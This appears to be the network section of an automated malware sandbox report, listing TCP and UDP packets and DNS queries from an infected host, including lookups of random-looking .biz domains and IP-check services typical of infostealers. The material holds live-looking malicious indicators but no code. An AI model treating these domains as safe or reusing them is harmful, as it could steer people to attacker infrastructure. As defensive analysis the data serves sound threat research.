                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127281904 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127295971 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127294064 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127352953 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127424002 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127435923 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127461910 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127477884 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127497911 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127513885 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127651930 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127664089 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127710104 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.246736050 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.246752024 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.246829033 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.319403887 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.319508076 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.319564104 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.323637962 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.367150068 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.493613958 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.493673086 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.613606930 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.613625050 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.702667952 CET4973180192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.821957111 CET804973118.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.822046041 CET4973180192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.833575964 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.839410067 CET4973180192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.839492083 CET4973180192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.846071005 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.879702091 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.958827972 CET804973118.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.958852053 CET804973118.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.965569973 CET804972772.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.223030090 CET804972772.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.273410082 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.457324028 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.576617002 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.960787058 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.962182045 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.962236881 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.962275028 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.970571041 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.970640898 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.970715046 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.978965044 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.979033947 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.979073048 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.987288952 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.987390995 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.987406969 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.995683908 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.995737076 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.995768070 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.004072905 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.004106045 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.004127979 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.012716055 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.012811899 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.388931990 CET4973280192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.508367062 CET804973218.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.508454084 CET4973280192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.508774042 CET4973280192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.508833885 CET4973280192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.628048897 CET804973218.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.628093004 CET804973218.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.864387035 CET804973118.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.864572048 CET804973118.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.864643097 CET4973180192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.864768028 CET4973180192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.984014034 CET804973118.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.345221043 CET4973380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.464584112 CET804973382.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.464668989 CET4973380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.465235949 CET4973380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.465343952 CET4973380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.552304983 CET804973218.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.552372932 CET804973218.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.552436113 CET4973280192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.557789087 CET4973280192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.584489107 CET804973382.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.584547997 CET804973382.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.676958084 CET804973218.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.096779108 CET4973480192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.216073990 CET804973482.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.216159105 CET4973480192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.216613054 CET4973480192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.216656923 CET4973480192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.335854053 CET804973482.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.335881948 CET804973482.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:03.979005098 CET8049730199.59.243.227192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:03.979068995 CET4973080192.168.2.9199.59.243.227
                                                                                                                                                                                                                        Dec 10, 2024 07:06:03.979681015 CET4973080192.168.2.9199.59.243.227
                                                                                                                                                                                                                        Dec 10, 2024 07:06:04.098865986 CET8049730199.59.243.227192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:17.833364010 CET8049726172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:17.835557938 CET4972680192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:06:17.835558891 CET4972680192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:06:17.954900026 CET8049726172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.371072054 CET804973382.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.371164083 CET4973380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.371340036 CET4973380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.396277905 CET4973680192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.490645885 CET804973382.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.516297102 CET804973682.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.516433001 CET4973680192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.516671896 CET4973680192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.516706944 CET4973680192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.635983944 CET804973682.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.636001110 CET804973682.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.121365070 CET804973482.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.122100115 CET4973480192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.138039112 CET4973480192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.257417917 CET804973482.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.494997025 CET4973780192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.614273071 CET804973782.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.615021944 CET4973780192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.615621090 CET4973780192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.615957975 CET4973780192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.734911919 CET804973782.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.735352039 CET804973782.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:24.837203026 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:24.837276936 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:06:24.837335110 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:06:24.956768036 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:35.898910046 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:06:36.018734932 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:36.018796921 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:06:42.433798075 CET804973682.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:42.434114933 CET4973680192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:42.446393013 CET4973680192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:42.565711975 CET804973682.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:43.512100935 CET804973782.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:43.512347937 CET4973780192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:43.907519102 CET4973780192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:43.971837997 CET4974180192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.026819944 CET804973782.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.091379881 CET804974182.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.091449976 CET4974180192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.091917992 CET4974180192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.091957092 CET4974180192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.211169004 CET804974182.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.211184978 CET804974182.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.351907015 CET4974280192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.471245050 CET804974282.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.471333027 CET4974280192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.471502066 CET4974280192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.471527100 CET4974280192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.590763092 CET804974282.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.590794086 CET804974282.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:57.316757917 CET804972872.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:57.316878080 CET4972880192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:06:57.325294971 CET4972880192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:06:57.445213079 CET804972872.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:00.223185062 CET804972772.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:00.223289013 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:07:00.223376989 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:07:00.342715025 CET804972772.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.012531042 CET804974182.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.012612104 CET4974180192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.030352116 CET4974180192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.058465958 CET4974380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.149837017 CET804974182.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.177936077 CET804974382.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.178014040 CET4974380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.178466082 CET4974380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.178495884 CET4974380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.297925949 CET804974382.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.297941923 CET804974382.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.356384039 CET804974282.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.356460094 CET4974280192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.356528997 CET4974280192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.458619118 CET4974480192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.475857973 CET804974282.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.578110933 CET804974482.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.578239918 CET4974480192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.578418016 CET4974480192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.578449965 CET4974480192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.697946072 CET804974482.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.697966099 CET804974482.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:28.075670004 CET804974382.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:28.083740950 CET4974380192.168.2.982.112.184.197
                                                                                                                                                                                                                        Dec 10, 2024 07:07:28.497364044 CET804974482.112.184.197192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:07:28.497525930 CET4974480192.168.2.982.112.184.197

                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Dec 10, 2024 07:05:19.959225893 CET4980153192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:20.967344046 CET4980153192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.528405905 CET53498011.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.528434038 CET53498011.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.394490957 CET5762053192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.476562977 CET6406453192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.531740904 CET53576201.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.613818884 CET53640641.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.332869053 CET5020853192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.622766972 CET5380953192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.762520075 CET53538091.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.805236101 CET53502081.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.763231993 CET5847153192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.900460005 CET53584711.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.035650969 CET6435653192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.509748936 CET53643561.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.504946947 CET6429353192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.642160892 CET53642931.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.095743895 CET5012353192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.576323986 CET53501231.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.900322914 CET5899353192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.927993059 CET4955153192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.038377047 CET53589931.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.253587961 CET53495511.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.514067888 CET5717853192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.593676090 CET5996853192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.730432034 CET53599681.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.743771076 CET53571781.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.895601988 CET6432553192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.083996058 CET6413553192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.221590996 CET53641351.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.445831060 CET53643251.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.314101934 CET5049853192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.319698095 CET6404553192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.713200092 CET53504981.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.760778904 CET53640451.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.011379957 CET5046053192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.223753929 CET53504601.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.224970102 CET5160053192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.697482109 CET53516001.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.092195034 CET6163953192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.229682922 CET53616391.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.230613947 CET6292553192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.367852926 CET53629251.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.884445906 CET6254353192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:57.107588053 CET53625431.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:57.108449936 CET6401353192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:57.323951006 CET53640131.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:57.324650049 CET5193653192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.320677996 CET5193653192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.339792013 CET53519361.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.457187891 CET53519361.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.645046949 CET5922453192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.782947063 CET53592241.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.783714056 CET5281053192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.923464060 CET53528101.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.924352884 CET5827753192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.061625957 CET53582771.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:42.456146955 CET6366953192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:06:43.388295889 CET53636691.1.1.1192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.169616938 CET6306853192.168.2.91.1.1.1
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.307065964 CET53630681.1.1.1192.168.2.9

                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Dec 10, 2024 07:05:19.959225893 CET192.168.2.91.1.1.10x5658Standard query (0)lwaziacademy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:20.967344046 CET192.168.2.91.1.1.10x5658Standard query (0)lwaziacademy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.394490957 CET192.168.2.91.1.1.10x1751Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.476562977 CET192.168.2.91.1.1.10xcc9fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.332869053 CET192.168.2.91.1.1.10xbe6bStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.622766972 CET192.168.2.91.1.1.10xd997Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.763231993 CET192.168.2.91.1.1.10x8e2dStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.035650969 CET192.168.2.91.1.1.10xe26Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.504946947 CET192.168.2.91.1.1.10xe499Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.095743895 CET192.168.2.91.1.1.10x541aStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.900322914 CET192.168.2.91.1.1.10x1613Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.927993059 CET192.168.2.91.1.1.10x4c43Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.514067888 CET192.168.2.91.1.1.10xf99Standard query (0)ww99.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.593676090 CET192.168.2.91.1.1.10x1e7cStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.895601988 CET192.168.2.91.1.1.10xc962Standard query (0)webmail.thematman.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.083996058 CET192.168.2.91.1.1.10xd53Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.314101934 CET192.168.2.91.1.1.10x998aStandard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.319698095 CET192.168.2.91.1.1.10x8fa1Standard query (0)ww7.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.011379957 CET192.168.2.91.1.1.10xc1ffStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.224970102 CET192.168.2.91.1.1.10xb6f9Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
